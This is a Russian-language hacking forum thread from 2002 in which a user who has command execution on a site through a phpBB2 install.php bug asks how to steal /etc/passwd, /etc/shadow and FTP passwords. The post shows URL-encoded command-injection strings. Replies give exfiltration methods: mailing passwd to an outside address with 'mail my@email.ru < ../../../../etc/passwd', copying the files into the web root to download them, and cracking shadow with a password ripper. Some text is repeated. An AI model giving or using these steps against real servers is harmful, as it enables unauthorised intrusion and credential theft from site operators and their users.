> Ситуация: > есть баг phpBB2...выполнение команд через install.php.В > общем выгялдет всё так: > cmd=ls%20../%20-la - я просматриваю дерево файлов сайта. > cmd=ls%20../../../../etc/passwd%20-la - а вот я уже вижу > файлы shadow and passwd. > Вопрос вот в чём:Как мне эти файл можно стянуть к > себе???Вообще получить фтп пароли? > з.ы.команда cat не катит вроде бы.
очень просто для passwd:
mail my@email.ru < ../../../../etc/passwd
и ты получишь файл passwd в свой ящик :)
но только - вот облом - вместо паролей там стоят звездочки :)
а вот файл shadow никто кроме рута читать не может ибо права на него - 400
да и заполучив даже shadow надо пароли еще расшифровать, что при грамотном их подборе практически невозможно :)
Ситуация:
есть баг phpBB2...выполнение команд через install.php.В общем выгялдет всё так:
cmd=ls%20../%20-la - я просматриваю дерево файлов сайта.
cmd=ls%20../../../../etc/passwd%20-la - а вот я уже вижу файлы shadow and passwd.
Вопрос вот в чём:Как мне эти файл можно стянуть к себе???Вообще получить фтп пароли?
з.ы.команда cat не катит вроде бы.
Удаленные команды.Etc/passwd или shadow03.07.02 07:29 Автор: Зюзя Статус: Незарегистрированный пользователь
> Ситуация: > есть баг phpBB2...выполнение команд через install.php.В > общем выгялдет всё так: > cmd=ls%20../%20-la - я просматриваю дерево файлов сайта. > cmd=ls%20../../../../etc/passwd%20-la - а вот я уже вижу > файлы shadow and passwd. > Вопрос вот в чём:Как мне эти файл можно стянуть к > себе???Вообще получить фтп пароли? > з.ы.команда cat не катит вроде бы.
поступило предложение просто % поставить %Qa и пехнуть всю бодягу
в бровзер в любимый(луче lynx) ну вот и лецизрей свой фаил...
если там админ не зюзя то хрен ты чего полцчиш (кроме списков юзеров и их UID i GID а как заметил там оди таварищ порольчики то будут ":x:" все.
так тырь луче shadow и поседи с какимнибуть рипером... и всё у тебя будит через пару суток
щасьтья и мир в ваш дом!
Удаленные команды.Etc/passwd или shadow29.06.02 00:18 Автор: J0ker Статус: Незарегистрированный пользователь
> Ситуация: > есть баг phpBB2...выполнение команд через install.php.В > общем выгялдет всё так: > cmd=ls%20../%20-la - я просматриваю дерево файлов сайта. > cmd=ls%20../../../../etc/passwd%20-la - а вот я уже вижу > файлы shadow and passwd. > Вопрос вот в чём:Как мне эти файл можно стянуть к > себе???Вообще получить фтп пароли? > з.ы.команда cat не катит вроде бы.
очень просто для passwd:
mail my@email.ru < ../../../../etc/passwd
и ты получишь файл passwd в свой ящик :)
но только - вот облом - вместо паролей там стоят звездочки :)
а вот файл shadow никто кроме рута читать не может ибо права на него - 400
да и заполучив даже shadow надо пароли еще расшифровать, что при грамотном их подборе практически невозможно :)
Удаленные команды.Etc/passwd или shadow22.06.02 12:29 Автор: werty Статус: Незарегистрированный пользователь
> Ситуация: > есть баг phpBB2...выполнение команд через install.php.В > общем выгялдет всё так: > cmd=ls%20../%20-la - я просматриваю дерево файлов сайта. > cmd=ls%20../../../../etc/passwd%20-la - а вот я уже вижу > файлы shadow and passwd. > Вопрос вот в чём:Как мне эти файл можно стянуть к > себе???Вообще получить фтп пароли? > з.ы.команда cat не катит вроде бы. дык если ты можешь просмотреть верхний уровень каталогов, то поидее или веб запущен под ротум , но значит ты без проблем сможешь их просмотреть cat"ом , но если не пускает, то попробуй постаринке перекинь их в веб дерикторию, а там копируй их через браузер, но врядли получиться , если веб не под рутом.
подробно о проекте
Анализ криптографических сетевых...
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
